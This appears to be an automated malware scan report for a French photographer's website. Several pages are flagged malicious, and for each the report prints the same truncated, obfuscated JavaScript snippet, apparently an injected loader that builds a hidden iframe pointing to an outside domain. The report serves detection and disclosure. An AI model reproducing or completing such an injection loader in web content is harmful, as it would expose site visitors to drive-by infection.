Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=caroff-photographe.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://caroff-photographe.fr/ | 200 OK Content-Length: 12713 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/includes/img.js | 200 OK Content-Length: 1084 Content-Type: application/javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://caroff-photographe.fr/index2.php?PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 15071 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/galeries.php?cat=1&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 15368 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/galeries.php?cat=15&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 8570 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/galeries.php?cat=21&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 9161 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/galeries.php?cat=13&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 10846 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/livre/livre.php?PHPSESSID=8e2513ab927ed683a96229859315a734 | 403 Forbidden Content-Length: 217 Content-Type: text/html | clean |
http://caroff-photographe.fr/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://caroff-photographe.fr/liens.php?PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 9061 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/prestations.php?PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 9007 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/galerie.php?gal=29&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 7990 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
| ||
http://caroff-photographe.fr/includes/scripts/prototype.js | 200 OK Content-Length: 71261 Content-Type: application/javascript | clean |
http://caroff-photographe.fr/includes/scripts/scriptaculous.js?load=effects | 200 OK Content-Length: 2404 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: caroff-photographe.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 16:26:30 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: 90planBAK=R698931959; path=/; expires=Thu, 21-Aug-2014 17:39:21 GMT
Set-Cookie: 90plan=R1531048398; path=/; expires=Thu, 21-Aug-2014 17:45:59 GMT
Set-Cookie: PHPSESSID=8e2513ab927ed683a96229859315a734; path=/
X-Powered-By: PHP/4.4.9
GET / HTTP/1.1
Host: caroff-photographe.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 16:26:30 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: 90planBAK=R698931959; path=/; expires=Thu, 21-Aug-2014 17:39:21 GMT
Set-Cookie: 90plan=R1531048398; path=/; expires=Thu, 21-Aug-2014 17:45:59 GMT
Set-Cookie: PHPSESSID=8e2513ab927ed683a96229859315a734; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: caroff-photographe.fr
Referer: http://www.google.com/search?q=caroff-photographe.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: caroff-photographe.fr
Referer: http://www.google.com/search?q=caroff-photographe.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.